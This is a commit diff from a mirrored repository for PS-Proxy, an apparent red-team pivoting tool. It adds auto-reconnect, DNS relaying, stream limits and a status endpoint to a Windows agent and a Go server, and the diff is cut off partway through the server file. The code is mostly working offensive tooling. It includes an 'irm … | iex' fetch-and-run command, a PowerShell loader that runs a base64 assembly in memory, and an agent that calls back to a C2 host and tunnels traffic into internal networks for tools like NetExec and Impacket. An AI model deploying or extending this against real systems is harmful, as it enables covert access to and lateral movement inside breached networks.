mirror of
https://github.com/Harrison-Wells-Cyber/PS-Proxy
synced 2026-07-26 08:06:34 +00:00
Polish tunnel reliability edge cases
This commit is contained in:
@@ -96,7 +96,10 @@ sudo ./psproxy-server \
|
|||||||
--cert /etc/letsencrypt/live/c2.example.com/fullchain.pem \
|
--cert /etc/letsencrypt/live/c2.example.com/fullchain.pem \
|
||||||
--key /etc/letsencrypt/live/c2.example.com/privkey.pem \
|
--key /etc/letsencrypt/live/c2.example.com/privkey.pem \
|
||||||
--route 10.10.10.0/24 \
|
--route 10.10.10.0/24 \
|
||||||
--redirect
|
--redirect \
|
||||||
|
--max-streams 256 \
|
||||||
|
--dns-listen 127.0.0.1:5353 \
|
||||||
|
--dns-target 10.10.10.10:53
|
||||||
```
|
```
|
||||||
|
|
||||||
With `--redirect`, PS-Proxy creates an iptables NAT chain for each `--route` and
|
With `--redirect`, PS-Proxy creates an iptables NAT chain for each `--route` and
|
||||||
@@ -140,7 +143,8 @@ ldapsearch -x -H ldap://127.0.0.1:1389 -D 'user@example.local' -W -b 'DC=example
|
|||||||
|
|
||||||
Transparent redirect mode is the recommended test-environment workflow right now.
|
Transparent redirect mode is the recommended test-environment workflow right now.
|
||||||
The fixed-target relay remains useful when you want a single local port mapped to
|
The fixed-target relay remains useful when you want a single local port mapped to
|
||||||
a single target for debugging.
|
a single target for debugging. Use `--max-streams` to cap concurrent proxied TCP
|
||||||
|
connections during high-concurrency tools such as NetExec; the default is 256. When `--dns-listen` and `--dns-target` are set together, the server exposes a UDP DNS listener and forwards raw DNS queries through the enrolled agent to the internal DNS server reachable from the agent host.
|
||||||
|
|
||||||
## Security notes
|
## Security notes
|
||||||
|
|
||||||
@@ -163,10 +167,14 @@ Implemented now:
|
|||||||
- Go TLS listener with mixed HTTP staging and raw agent tunnel handling.
|
- Go TLS listener with mixed HTTP staging and raw agent tunnel handling.
|
||||||
- Leaf certificate pin calculation for generated agent configuration.
|
- Leaf certificate pin calculation for generated agent configuration.
|
||||||
- Short-lived one-time staging URLs.
|
- Short-lived one-time staging URLs.
|
||||||
- One-time enrollment token validation for the raw tunnel.
|
- One-time enrollment token validation for the raw tunnel plus reconnect-token authentication after first enrollment.
|
||||||
|
- Agent auto-reconnect with exponential backoff for transient tunnel failures.
|
||||||
- Framed multiplexed stream protocol.
|
- Framed multiplexed stream protocol.
|
||||||
- Linux transparent TCP redirect mode for direct local-tool TCP connections to routed target IPs.
|
- Linux transparent TCP redirect mode for direct local-tool TCP connections to routed target IPs.
|
||||||
- Fixed-target TCP relay mode for protocol validation.
|
- Fixed-target TCP relay mode for protocol validation.
|
||||||
|
- Bounded concurrent stream handling with per-stream local write queues so one slow local TCP client cannot block the whole multiplexed agent session.
|
||||||
|
- Optional UDP DNS relay that forwards raw DNS queries through the agent to an internal DNS server.
|
||||||
|
- JSON `/status` endpoint for agent and stream visibility.
|
||||||
- C# agent stream relay that opens normal outbound `TcpClient` connections from
|
- C# agent stream relay that opens normal outbound `TcpClient` connections from
|
||||||
the Windows host.
|
the Windows host.
|
||||||
- PowerShell loader template that loads a compressed/base64 managed assembly from
|
- PowerShell loader template that loads a compressed/base64 managed assembly from
|
||||||
@@ -190,5 +198,6 @@ matrix that includes:
|
|||||||
- NetExec SMB/LDAP tests;
|
- NetExec SMB/LDAP tests;
|
||||||
- Impacket SMB/LDAP/RPC tests;
|
- Impacket SMB/LDAP/RPC tests;
|
||||||
- reconnect and stale route cleanup tests;
|
- reconnect and stale route cleanup tests;
|
||||||
|
- DNS relay tests against an internal AD DNS server;
|
||||||
- malformed frame and enrollment fuzz tests;
|
- malformed frame and enrollment fuzz tests;
|
||||||
- certificate pin mismatch tests.
|
- certificate pin mismatch tests.
|
||||||
|
|||||||
@@ -14,38 +14,63 @@ namespace PSProxy.Agent
|
|||||||
{
|
{
|
||||||
public sealed class Tunnel
|
public sealed class Tunnel
|
||||||
{
|
{
|
||||||
private const byte FrameOpen = 1, FrameOpenOK = 2, FrameOpenFail = 3, FrameData = 4, FrameClose = 5, FramePing = 6, FramePong = 7;
|
private const byte FrameOpen = 1, FrameOpenOK = 2, FrameOpenFail = 3, FrameData = 4, FrameClose = 5, FramePing = 6, FramePong = 7, FrameDNSQuery = 8, FrameDNSReply = 9;
|
||||||
private const int MaxPayload = 1 << 20;
|
private const int MaxPayload = 1 << 20;
|
||||||
private readonly string server;
|
private readonly string server;
|
||||||
private readonly int port;
|
private readonly int port;
|
||||||
private readonly string certPin;
|
private readonly string certPin;
|
||||||
private readonly string enrollToken;
|
private readonly string enrollToken;
|
||||||
|
private readonly string reconnectToken;
|
||||||
|
private readonly string dnsTarget;
|
||||||
private readonly ConcurrentDictionary<ulong, StreamCtx> streams = new ConcurrentDictionary<ulong, StreamCtx>();
|
private readonly ConcurrentDictionary<ulong, StreamCtx> streams = new ConcurrentDictionary<ulong, StreamCtx>();
|
||||||
private readonly object sendLock = new object();
|
private readonly object sendLock = new object();
|
||||||
private SslStream tls;
|
private SslStream tls;
|
||||||
private volatile bool stopping;
|
private volatile bool stopping;
|
||||||
|
|
||||||
public Tunnel(string server, int port, string certPin, string enrollToken)
|
public Tunnel(string server, int port, string certPin, string enrollToken, string reconnectToken, string dnsTarget)
|
||||||
{
|
{
|
||||||
this.server = server;
|
this.server = server;
|
||||||
this.port = port;
|
this.port = port;
|
||||||
this.certPin = NormalizeHex(certPin);
|
this.certPin = NormalizeHex(certPin);
|
||||||
this.enrollToken = enrollToken;
|
this.enrollToken = enrollToken;
|
||||||
|
this.reconnectToken = reconnectToken ?? "";
|
||||||
|
this.dnsTarget = dnsTarget ?? "";
|
||||||
if (this.certPin.Length != 64) throw new ArgumentException("CertPin must be a SHA-256 hex string");
|
if (this.certPin.Length != 64) throw new ArgumentException("CertPin must be a SHA-256 hex string");
|
||||||
if (String.IsNullOrWhiteSpace(enrollToken)) throw new ArgumentException("EnrollToken is required");
|
if (String.IsNullOrWhiteSpace(enrollToken)) throw new ArgumentException("EnrollToken is required");
|
||||||
}
|
}
|
||||||
|
|
||||||
public void Run()
|
public void Run()
|
||||||
|
{
|
||||||
|
int delayMs = 1000;
|
||||||
|
while (!stopping)
|
||||||
|
{
|
||||||
|
try
|
||||||
|
{
|
||||||
|
RunOnce();
|
||||||
|
delayMs = 1000;
|
||||||
|
}
|
||||||
|
catch (Exception ex)
|
||||||
|
{
|
||||||
|
Console.Error.WriteLine("[ps-proxy] tunnel error: {0}", ex.Message);
|
||||||
|
CloseAllStreams();
|
||||||
|
if (stopping) break;
|
||||||
|
Thread.Sleep(delayMs);
|
||||||
|
delayMs = Math.Min(delayMs * 2, 30000);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
private void RunOnce()
|
||||||
{
|
{
|
||||||
Console.Error.WriteLine("[ps-proxy] connecting to {0}:{1}", server, port);
|
Console.Error.WriteLine("[ps-proxy] connecting to {0}:{1}", server, port);
|
||||||
using (var tcp = new TcpClient())
|
using (var tcp = new TcpClient())
|
||||||
{
|
{
|
||||||
tcp.NoDelay = true;
|
tcp.NoDelay = true;
|
||||||
tcp.Connect(server, port);
|
ConnectWithTimeout(tcp, server, port, 15000);
|
||||||
using (tls = new SslStream(tcp.GetStream(), false, ValidateServerCertificate))
|
using (tls = new SslStream(tcp.GetStream(), false, ValidateServerCertificate))
|
||||||
{
|
{
|
||||||
tls.AuthenticateAsClient(server, null, SslProtocols.Tls12, false);
|
tls.AuthenticateAsClient(server, null, SslProtocols.Tls12, false);
|
||||||
WriteAscii("PSP1\nENROLL " + enrollToken + "\n");
|
WriteAscii("PSP1\nENROLL " + enrollToken + " " + reconnectToken + "\n");
|
||||||
Frame hello = ReadFrame();
|
Frame hello = ReadFrame();
|
||||||
if (hello.Type != FramePong || Encoding.ASCII.GetString(hello.Payload) != "OK") throw new Exception("server did not accept enrollment");
|
if (hello.Type != FramePong || Encoding.ASCII.GetString(hello.Payload) != "OK") throw new Exception("server did not accept enrollment");
|
||||||
Console.Error.WriteLine("[ps-proxy] enrolled and ready");
|
Console.Error.WriteLine("[ps-proxy] enrolled and ready");
|
||||||
@@ -65,6 +90,7 @@ namespace PSProxy.Agent
|
|||||||
case FrameData: HandleData(f.StreamID, f.Payload); break;
|
case FrameData: HandleData(f.StreamID, f.Payload); break;
|
||||||
case FrameClose: CloseStream(f.StreamID, false); break;
|
case FrameClose: CloseStream(f.StreamID, false); break;
|
||||||
case FramePing: SendFrame(new Frame(f.StreamID, FramePong, new byte[0])); break;
|
case FramePing: SendFrame(new Frame(f.StreamID, FramePong, new byte[0])); break;
|
||||||
|
case FrameDNSQuery: StartDnsQuery(f.StreamID, f.Payload); break;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -76,7 +102,7 @@ namespace PSProxy.Agent
|
|||||||
string host; int dstPort; SplitTarget(target, out host, out dstPort);
|
string host; int dstPort; SplitTarget(target, out host, out dstPort);
|
||||||
var client = new TcpClient();
|
var client = new TcpClient();
|
||||||
client.NoDelay = true;
|
client.NoDelay = true;
|
||||||
client.Connect(host, dstPort);
|
ConnectWithTimeout(client, host, dstPort, 15000);
|
||||||
var ctx = new StreamCtx(sid, client);
|
var ctx = new StreamCtx(sid, client);
|
||||||
if (!streams.TryAdd(sid, ctx)) { client.Close(); throw new Exception("duplicate stream"); }
|
if (!streams.TryAdd(sid, ctx)) { client.Close(); throw new Exception("duplicate stream"); }
|
||||||
SendFrame(new Frame(sid, FrameOpenOK, new byte[0]));
|
SendFrame(new Frame(sid, FrameOpenOK, new byte[0]));
|
||||||
@@ -98,6 +124,36 @@ namespace PSProxy.Agent
|
|||||||
catch { CloseStream(sid, true); }
|
catch { CloseStream(sid, true); }
|
||||||
}
|
}
|
||||||
|
|
||||||
|
private void StartDnsQuery(ulong sid, byte[] payload)
|
||||||
|
{
|
||||||
|
var t = new Thread(delegate() { HandleDnsQuery(sid, payload); });
|
||||||
|
t.IsBackground = true;
|
||||||
|
t.Start();
|
||||||
|
}
|
||||||
|
|
||||||
|
private void HandleDnsQuery(ulong sid, byte[] payload)
|
||||||
|
{
|
||||||
|
try
|
||||||
|
{
|
||||||
|
if (String.IsNullOrWhiteSpace(dnsTarget)) throw new Exception("DNS target is not configured");
|
||||||
|
string host; int dstPort; SplitTarget(dnsTarget, out host, out dstPort);
|
||||||
|
using (var udp = new UdpClient())
|
||||||
|
{
|
||||||
|
udp.Client.ReceiveTimeout = 5000;
|
||||||
|
udp.Connect(host, dstPort);
|
||||||
|
udp.Send(payload, payload.Length);
|
||||||
|
IPEndPoint ep = null;
|
||||||
|
byte[] resp = udp.Receive(ref ep);
|
||||||
|
SendFrame(new Frame(sid, FrameDNSReply, resp));
|
||||||
|
}
|
||||||
|
}
|
||||||
|
catch (Exception ex)
|
||||||
|
{
|
||||||
|
Console.Error.WriteLine("[ps-proxy] DNS query failed: " + ex.Message);
|
||||||
|
SendFrame(new Frame(sid, FrameDNSReply, new byte[0]));
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
private void PumpTargetToServer(StreamCtx ctx)
|
private void PumpTargetToServer(StreamCtx ctx)
|
||||||
{
|
{
|
||||||
byte[] buf = new byte[32768];
|
byte[] buf = new byte[32768];
|
||||||
@@ -126,6 +182,11 @@ namespace PSProxy.Agent
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
private void CloseAllStreams()
|
||||||
|
{
|
||||||
|
foreach (ulong sid in streams.Keys) CloseStream(sid, false);
|
||||||
|
}
|
||||||
|
|
||||||
private void SendFrame(Frame f)
|
private void SendFrame(Frame f)
|
||||||
{
|
{
|
||||||
if (f.Payload == null) f.Payload = new byte[0];
|
if (f.Payload == null) f.Payload = new byte[0];
|
||||||
@@ -192,6 +253,17 @@ namespace PSProxy.Agent
|
|||||||
if (dstPort < 1 || dstPort > 65535) throw new ArgumentException("invalid port");
|
if (dstPort < 1 || dstPort > 65535) throw new ArgumentException("invalid port");
|
||||||
}
|
}
|
||||||
|
|
||||||
|
private static void ConnectWithTimeout(TcpClient client, string host, int dstPort, int timeoutMs)
|
||||||
|
{
|
||||||
|
IAsyncResult ar = client.BeginConnect(host, dstPort, null, null);
|
||||||
|
if (!ar.AsyncWaitHandle.WaitOne(timeoutMs))
|
||||||
|
{
|
||||||
|
try { client.Close(); } catch { }
|
||||||
|
throw new TimeoutException("connect timed out: " + host + ":" + dstPort);
|
||||||
|
}
|
||||||
|
client.EndConnect(ar);
|
||||||
|
}
|
||||||
|
|
||||||
private static string NormalizeHex(string s) { return (s ?? "").Trim().ToLowerInvariant().Replace(":", "").Replace(" ", ""); }
|
private static string NormalizeHex(string s) { return (s ?? "").Trim().ToLowerInvariant().Replace(":", "").Replace(" ", ""); }
|
||||||
private static void WriteI32BE(byte[] b, int o, int v) { b[o] = (byte)(v >> 24); b[o + 1] = (byte)(v >> 16); b[o + 2] = (byte)(v >> 8); b[o + 3] = (byte)v; }
|
private static void WriteI32BE(byte[] b, int o, int v) { b[o] = (byte)(v >> 24); b[o + 1] = (byte)(v >> 16); b[o + 2] = (byte)(v >> 8); b[o + 3] = (byte)v; }
|
||||||
private static int ReadI32BE(byte[] b, int o) { return ((int)b[o] << 24) | ((int)b[o + 1] << 16) | ((int)b[o + 2] << 8) | (int)b[o + 3]; }
|
private static int ReadI32BE(byte[] b, int o) { return ((int)b[o] << 24) | ((int)b[o + 1] << 16) | ((int)b[o + 2] << 8) | (int)b[o + 3]; }
|
||||||
|
|||||||
@@ -4,6 +4,8 @@ param(
|
|||||||
[int]$Port = {{.Port}},
|
[int]$Port = {{.Port}},
|
||||||
[string]$CertPin = "{{.CertPin}}",
|
[string]$CertPin = "{{.CertPin}}",
|
||||||
[string]$EnrollToken = "{{.EnrollToken}}",
|
[string]$EnrollToken = "{{.EnrollToken}}",
|
||||||
|
[string]$ReconnectToken = "{{.ReconnectToken}}",
|
||||||
|
[string]$DNSTarget = "{{.DNSTarget}}",
|
||||||
[switch]$NoAutoStart
|
[switch]$NoAutoStart
|
||||||
)
|
)
|
||||||
$ErrorActionPreference = "Stop"
|
$ErrorActionPreference = "Stop"
|
||||||
@@ -29,10 +31,12 @@ function Start-PSTunnel {
|
|||||||
[Parameter(Mandatory=$true)][string]$Server,
|
[Parameter(Mandatory=$true)][string]$Server,
|
||||||
[int]$Port = 443,
|
[int]$Port = 443,
|
||||||
[Parameter(Mandatory=$true)][string]$CertPin,
|
[Parameter(Mandatory=$true)][string]$CertPin,
|
||||||
[Parameter(Mandatory=$true)][string]$EnrollToken
|
[Parameter(Mandatory=$true)][string]$EnrollToken,
|
||||||
|
[string]$ReconnectToken = "",
|
||||||
|
[string]$DNSTarget = ""
|
||||||
)
|
)
|
||||||
if (-not ("PSProxy.Agent.Tunnel" -as [type])) { Import-PSProxyAgentAssembly }
|
if (-not ("PSProxy.Agent.Tunnel" -as [type])) { Import-PSProxyAgentAssembly }
|
||||||
$t = New-Object PSProxy.Agent.Tunnel -ArgumentList @($Server, $Port, $CertPin, $EnrollToken)
|
$t = New-Object PSProxy.Agent.Tunnel -ArgumentList @($Server, $Port, $CertPin, $EnrollToken, $ReconnectToken, $DNSTarget)
|
||||||
$t.Run()
|
$t.Run()
|
||||||
}
|
}
|
||||||
if (-not $NoAutoStart) { Start-PSTunnel -Server $Server -Port $Port -CertPin $CertPin -EnrollToken $EnrollToken }
|
if (-not $NoAutoStart) { Start-PSTunnel -Server $Server -Port $Port -CertPin $CertPin -EnrollToken $EnrollToken -ReconnectToken $ReconnectToken -DNSTarget $DNSTarget }
|
||||||
|
|||||||
+259
-32
@@ -5,6 +5,7 @@ import (
|
|||||||
"crypto/sha256"
|
"crypto/sha256"
|
||||||
"crypto/tls"
|
"crypto/tls"
|
||||||
"encoding/hex"
|
"encoding/hex"
|
||||||
|
"encoding/json"
|
||||||
"encoding/pem"
|
"encoding/pem"
|
||||||
"errors"
|
"errors"
|
||||||
"flag"
|
"flag"
|
||||||
@@ -38,6 +39,9 @@ func main() {
|
|||||||
agentAssemblyFile := flag.String("agent-assembly-b64-file", "", "file containing compressed/base64 PSProxy.Agent.dll; defaults to release/agent_assembly.b64 when present")
|
agentAssemblyFile := flag.String("agent-assembly-b64-file", "", "file containing compressed/base64 PSProxy.Agent.dll; defaults to release/agent_assembly.b64 when present")
|
||||||
redirect := flag.Bool("redirect", false, "install Linux iptables REDIRECT rules for --route CIDRs and relay original destinations through the agent")
|
redirect := flag.Bool("redirect", false, "install Linux iptables REDIRECT rules for --route CIDRs and relay original destinations through the agent")
|
||||||
redirectPort := flag.Int("redirect-port", 15080, "local transparent redirect listener port")
|
redirectPort := flag.Int("redirect-port", 15080, "local transparent redirect listener port")
|
||||||
|
maxStreams := flag.Int("max-streams", 256, "maximum concurrent proxied TCP streams")
|
||||||
|
dnsListen := flag.String("dns-listen", "", "optional UDP DNS listener that forwards queries through the agent, e.g. 127.0.0.1:5353")
|
||||||
|
dnsTarget := flag.String("dns-target", "", "DNS server reachable by the agent for --dns-listen queries, e.g. 10.10.10.10:53")
|
||||||
tcpListen := flag.String("tcp-listen", "", "developer TCP relay listener, e.g. 127.0.0.1:1389")
|
tcpListen := flag.String("tcp-listen", "", "developer TCP relay listener, e.g. 127.0.0.1:1389")
|
||||||
tcpTarget := flag.String("tcp-target", "", "developer TCP relay target opened by the agent, e.g. 10.10.10.219:389")
|
tcpTarget := flag.String("tcp-target", "", "developer TCP relay target opened by the agent, e.g. 10.10.10.219:389")
|
||||||
routes := multiFlag{}
|
routes := multiFlag{}
|
||||||
@@ -57,9 +61,15 @@ func main() {
|
|||||||
if (*tcpListen == "") != (*tcpTarget == "") {
|
if (*tcpListen == "") != (*tcpTarget == "") {
|
||||||
log.Fatal("--tcp-listen and --tcp-target must be supplied together")
|
log.Fatal("--tcp-listen and --tcp-target must be supplied together")
|
||||||
}
|
}
|
||||||
|
if (*dnsListen == "") != (*dnsTarget == "") {
|
||||||
|
log.Fatal("--dns-listen and --dns-target must be supplied together")
|
||||||
|
}
|
||||||
if *redirect && len(routes) == 0 {
|
if *redirect && len(routes) == 0 {
|
||||||
log.Fatal("--redirect requires at least one --route CIDR")
|
log.Fatal("--redirect requires at least one --route CIDR")
|
||||||
}
|
}
|
||||||
|
if err := validateRoutes(routes); err != nil {
|
||||||
|
log.Fatal(err)
|
||||||
|
}
|
||||||
pin, err := certPin(*cert)
|
pin, err := certPin(*cert)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
log.Fatalf("certificate pin failed: %v", err)
|
log.Fatalf("certificate pin failed: %v", err)
|
||||||
@@ -73,14 +83,15 @@ func main() {
|
|||||||
}
|
}
|
||||||
tmpl := template.Must(template.ParseFiles(*agentTemplate))
|
tmpl := template.Must(template.ParseFiles(*agentTemplate))
|
||||||
store := staging.NewStore(*ttl)
|
store := staging.NewStore(*ttl)
|
||||||
sess, err := store.Create(*domain, *port, pin)
|
sess, err := store.Create(*domain, *port, pin, *dnsTarget)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
log.Fatal(err)
|
log.Fatal(err)
|
||||||
}
|
}
|
||||||
server := NewTunnelServer(store)
|
server := NewTunnelServer(store, *maxStreams)
|
||||||
mux := http.NewServeMux()
|
mux := http.NewServeMux()
|
||||||
mux.HandleFunc("GET /a/{id}", staging.AgentHandler(store, tmpl, assembly))
|
mux.HandleFunc("GET /a/{id}", staging.AgentHandler(store, tmpl, assembly))
|
||||||
mux.HandleFunc("GET /healthz", func(w http.ResponseWriter, r *http.Request) { _, _ = w.Write([]byte("ok\n")) })
|
mux.HandleFunc("GET /healthz", func(w http.ResponseWriter, r *http.Request) { _, _ = w.Write([]byte("ok\n")) })
|
||||||
|
mux.HandleFunc("GET /status", statusHandler(server))
|
||||||
var redirectCleanup func()
|
var redirectCleanup func()
|
||||||
if *redirect {
|
if *redirect {
|
||||||
redirectCleanup = setupRedirectOrFatal(routes, *redirectPort)
|
redirectCleanup = setupRedirectOrFatal(routes, *redirectPort)
|
||||||
@@ -90,6 +101,9 @@ func main() {
|
|||||||
if *tcpListen != "" {
|
if *tcpListen != "" {
|
||||||
go serveTCPRelay(*tcpListen, *tcpTarget, server)
|
go serveTCPRelay(*tcpListen, *tcpTarget, server)
|
||||||
}
|
}
|
||||||
|
if *dnsListen != "" {
|
||||||
|
go serveDNSRelay(*dnsListen, server)
|
||||||
|
}
|
||||||
installSignalCleanup(redirectCleanup)
|
installSignalCleanup(redirectCleanup)
|
||||||
addr := fmt.Sprintf("%s:%d", *listen, *port)
|
addr := fmt.Sprintf("%s:%d", *listen, *port)
|
||||||
log.Printf("PS-Proxy Go server starting on https://%s", addr)
|
log.Printf("PS-Proxy Go server starting on https://%s", addr)
|
||||||
@@ -102,18 +116,28 @@ func main() {
|
|||||||
if *tcpListen != "" {
|
if *tcpListen != "" {
|
||||||
log.Printf("Developer TCP relay: %s -> agent -> %s", *tcpListen, *tcpTarget)
|
log.Printf("Developer TCP relay: %s -> agent -> %s", *tcpListen, *tcpTarget)
|
||||||
}
|
}
|
||||||
|
if *dnsListen != "" {
|
||||||
|
log.Printf("DNS relay: %s -> agent -> %s", *dnsListen, *dnsTarget)
|
||||||
|
}
|
||||||
log.Printf("Run this on the Windows host: irm %s/a/%s | iex", publicURL(*domain, *port), sess.ID)
|
log.Printf("Run this on the Windows host: irm %s/a/%s | iex", publicURL(*domain, *port), sess.ID)
|
||||||
log.Fatal(serveMixedTLS(addr, *cert, *key, mux, server))
|
log.Fatal(serveMixedTLS(addr, *cert, *key, mux, server))
|
||||||
}
|
}
|
||||||
|
|
||||||
type TunnelServer struct {
|
type TunnelServer struct {
|
||||||
store *staging.Store
|
store *staging.Store
|
||||||
mu sync.Mutex
|
mu sync.Mutex
|
||||||
session *AgentSession
|
session *AgentSession
|
||||||
nextID atomic.Uint64
|
nextID atomic.Uint64
|
||||||
|
dnsID atomic.Uint64
|
||||||
|
maxStreams int
|
||||||
}
|
}
|
||||||
|
|
||||||
func NewTunnelServer(store *staging.Store) *TunnelServer { return &TunnelServer{store: store} }
|
func NewTunnelServer(store *staging.Store, maxStreams int) *TunnelServer {
|
||||||
|
if maxStreams < 1 {
|
||||||
|
maxStreams = 1
|
||||||
|
}
|
||||||
|
return &TunnelServer{store: store, maxStreams: maxStreams}
|
||||||
|
}
|
||||||
|
|
||||||
func (s *TunnelServer) SetSession(a *AgentSession) {
|
func (s *TunnelServer) SetSession(a *AgentSession) {
|
||||||
s.mu.Lock()
|
s.mu.Lock()
|
||||||
@@ -127,13 +151,23 @@ func (s *TunnelServer) SetSession(a *AgentSession) {
|
|||||||
|
|
||||||
func (s *TunnelServer) Current() *AgentSession { s.mu.Lock(); defer s.mu.Unlock(); return s.session }
|
func (s *TunnelServer) Current() *AgentSession { s.mu.Lock(); defer s.mu.Unlock(); return s.session }
|
||||||
|
|
||||||
|
func (s *TunnelServer) ClearSession(a *AgentSession) {
|
||||||
|
s.mu.Lock()
|
||||||
|
if s.session == a {
|
||||||
|
s.session = nil
|
||||||
|
}
|
||||||
|
s.mu.Unlock()
|
||||||
|
}
|
||||||
|
|
||||||
func (s *TunnelServer) OpenAttached(target string, local net.Conn) (*AgentSession, uint64, error) {
|
func (s *TunnelServer) OpenAttached(target string, local net.Conn) (*AgentSession, uint64, error) {
|
||||||
a := s.Current()
|
a := s.Current()
|
||||||
if a == nil {
|
if a == nil {
|
||||||
return nil, 0, errors.New("no enrolled agent connected")
|
return nil, 0, errors.New("no enrolled agent connected")
|
||||||
}
|
}
|
||||||
id := s.nextID.Add(1)
|
id := s.nextID.Add(1)
|
||||||
a.AttachLocal(id, local)
|
if err := a.AttachLocal(id, local); err != nil {
|
||||||
|
return nil, 0, err
|
||||||
|
}
|
||||||
if err := a.Open(id, target); err != nil {
|
if err := a.Open(id, target); err != nil {
|
||||||
a.RemoveLocal(id)
|
a.RemoveLocal(id)
|
||||||
return nil, 0, err
|
return nil, 0, err
|
||||||
@@ -142,21 +176,45 @@ func (s *TunnelServer) OpenAttached(target string, local net.Conn) (*AgentSessio
|
|||||||
}
|
}
|
||||||
|
|
||||||
type AgentSession struct {
|
type AgentSession struct {
|
||||||
conn net.Conn
|
conn net.Conn
|
||||||
br *bufio.Reader
|
br *bufio.Reader
|
||||||
sendMu sync.Mutex
|
sendMu sync.Mutex
|
||||||
closeOnce sync.Once
|
closeOnce sync.Once
|
||||||
closed chan struct{}
|
closed chan struct{}
|
||||||
mu sync.Mutex
|
mu sync.Mutex
|
||||||
pending map[uint64]chan error
|
pending map[uint64]chan error
|
||||||
locals map[uint64]net.Conn
|
dnsPending map[uint64]chan []byte
|
||||||
|
locals map[uint64]*localStream
|
||||||
|
maxStreams int
|
||||||
}
|
}
|
||||||
|
|
||||||
func NewAgentSession(c net.Conn, br *bufio.Reader) *AgentSession {
|
func NewAgentSession(c net.Conn, br *bufio.Reader, maxStreams int) *AgentSession {
|
||||||
return &AgentSession{conn: c, br: br, closed: make(chan struct{}), pending: map[uint64]chan error{}, locals: map[uint64]net.Conn{}}
|
if maxStreams < 1 {
|
||||||
|
maxStreams = 1
|
||||||
|
}
|
||||||
|
return &AgentSession{conn: c, br: br, closed: make(chan struct{}), pending: map[uint64]chan error{}, dnsPending: map[uint64]chan []byte{}, locals: map[uint64]*localStream{}, maxStreams: maxStreams}
|
||||||
}
|
}
|
||||||
|
|
||||||
func (a *AgentSession) Close() { a.closeOnce.Do(func() { close(a.closed); _ = a.conn.Close() }) }
|
func (a *AgentSession) Close() {
|
||||||
|
a.closeOnce.Do(func() {
|
||||||
|
close(a.closed)
|
||||||
|
_ = a.conn.Close()
|
||||||
|
a.mu.Lock()
|
||||||
|
for id, ch := range a.pending {
|
||||||
|
delete(a.pending, id)
|
||||||
|
ch <- errors.New("agent session closed")
|
||||||
|
}
|
||||||
|
for id, ch := range a.dnsPending {
|
||||||
|
delete(a.dnsPending, id)
|
||||||
|
close(ch)
|
||||||
|
}
|
||||||
|
for id, ls := range a.locals {
|
||||||
|
delete(a.locals, id)
|
||||||
|
ls.close()
|
||||||
|
}
|
||||||
|
a.mu.Unlock()
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
func (a *AgentSession) send(f protocol.Frame) error {
|
func (a *AgentSession) send(f protocol.Frame) error {
|
||||||
a.sendMu.Lock()
|
a.sendMu.Lock()
|
||||||
@@ -186,16 +244,29 @@ func (a *AgentSession) Open(id uint64, target string) error {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
func (a *AgentSession) AttachLocal(id uint64, c net.Conn) {
|
func (a *AgentSession) AttachLocal(id uint64, c net.Conn) error {
|
||||||
a.mu.Lock()
|
a.mu.Lock()
|
||||||
a.locals[id] = c
|
defer a.mu.Unlock()
|
||||||
a.mu.Unlock()
|
select {
|
||||||
|
case <-a.closed:
|
||||||
|
return errors.New("agent session closed")
|
||||||
|
default:
|
||||||
|
}
|
||||||
|
if len(a.locals) >= a.maxStreams {
|
||||||
|
return fmt.Errorf("maximum concurrent streams reached: %d", a.maxStreams)
|
||||||
|
}
|
||||||
|
a.locals[id] = newLocalStream(c)
|
||||||
|
return nil
|
||||||
}
|
}
|
||||||
|
|
||||||
func (a *AgentSession) RemoveLocal(id uint64) {
|
func (a *AgentSession) RemoveLocal(id uint64) {
|
||||||
a.mu.Lock()
|
a.mu.Lock()
|
||||||
|
ls := a.locals[id]
|
||||||
delete(a.locals, id)
|
delete(a.locals, id)
|
||||||
a.mu.Unlock()
|
a.mu.Unlock()
|
||||||
|
if ls != nil {
|
||||||
|
ls.close()
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
func (a *AgentSession) Run() {
|
func (a *AgentSession) Run() {
|
||||||
@@ -225,18 +296,21 @@ func (a *AgentSession) Run() {
|
|||||||
}
|
}
|
||||||
case protocol.FrameData:
|
case protocol.FrameData:
|
||||||
a.mu.Lock()
|
a.mu.Lock()
|
||||||
c := a.locals[f.StreamID]
|
ls := a.locals[f.StreamID]
|
||||||
a.mu.Unlock()
|
a.mu.Unlock()
|
||||||
if c != nil {
|
if ls != nil && !ls.enqueue(f.Payload) {
|
||||||
_, _ = c.Write(f.Payload)
|
a.RemoveLocal(f.StreamID)
|
||||||
|
_ = a.send(protocol.Frame{StreamID: f.StreamID, Type: protocol.FrameClose})
|
||||||
}
|
}
|
||||||
case protocol.FrameClose:
|
case protocol.FrameClose:
|
||||||
|
a.RemoveLocal(f.StreamID)
|
||||||
|
case protocol.FrameDNSReply:
|
||||||
a.mu.Lock()
|
a.mu.Lock()
|
||||||
c := a.locals[f.StreamID]
|
ch := a.dnsPending[f.StreamID]
|
||||||
delete(a.locals, f.StreamID)
|
delete(a.dnsPending, f.StreamID)
|
||||||
a.mu.Unlock()
|
a.mu.Unlock()
|
||||||
if c != nil {
|
if ch != nil {
|
||||||
_ = c.Close()
|
ch <- f.Payload
|
||||||
}
|
}
|
||||||
case protocol.FramePing:
|
case protocol.FramePing:
|
||||||
_ = a.send(protocol.Frame{StreamID: f.StreamID, Type: protocol.FramePong})
|
_ = a.send(protocol.Frame{StreamID: f.StreamID, Type: protocol.FramePong})
|
||||||
@@ -244,6 +318,140 @@ func (a *AgentSession) Run() {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
type localStream struct {
|
||||||
|
conn net.Conn
|
||||||
|
ch chan []byte
|
||||||
|
done chan struct{}
|
||||||
|
once sync.Once
|
||||||
|
}
|
||||||
|
|
||||||
|
func newLocalStream(c net.Conn) *localStream {
|
||||||
|
ls := &localStream{conn: c, ch: make(chan []byte, 32), done: make(chan struct{})}
|
||||||
|
go ls.writeLoop()
|
||||||
|
return ls
|
||||||
|
}
|
||||||
|
|
||||||
|
